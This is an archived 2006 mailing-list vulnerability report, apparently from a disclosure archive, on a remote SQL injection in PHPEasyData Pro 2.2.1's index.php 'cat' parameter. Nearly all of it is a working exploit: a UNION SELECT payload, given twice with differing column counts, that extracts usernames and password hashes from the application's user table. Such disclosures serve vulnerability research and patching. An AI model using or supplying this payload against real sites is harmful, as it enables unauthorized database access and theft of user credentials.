|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
PHPEasyData Pro 2.2.1 (index.php) Remote SQL Injection Vulnerability
ajannhwt
hotmail.com
Date: Sun Oct 29 2006 - 14:08:03 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Vulnerability Report
*******************************************************************************
# Title : PHPEasyData Pro 2.2.1 (index.php) Remote SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
###http://[target]/[path]/index.php?cat=[ SQL ]
Example:
//index.php?cat=-1/**/union/**/select/**/0,concat(user_login,char(32),user_pass),0,0,0/**/from/**/an_users/**/where/**/user_id%20like%205/*
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
###http://[target]/[path]/index.php?cat=[ SQL ]
Example:
//index.php?cat=-1/**/union/**/select/**/0,concat(user_login,char(32),user_pass),0,0/**/from/**/an_users/**/where/**/user_id%20like%205/*
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]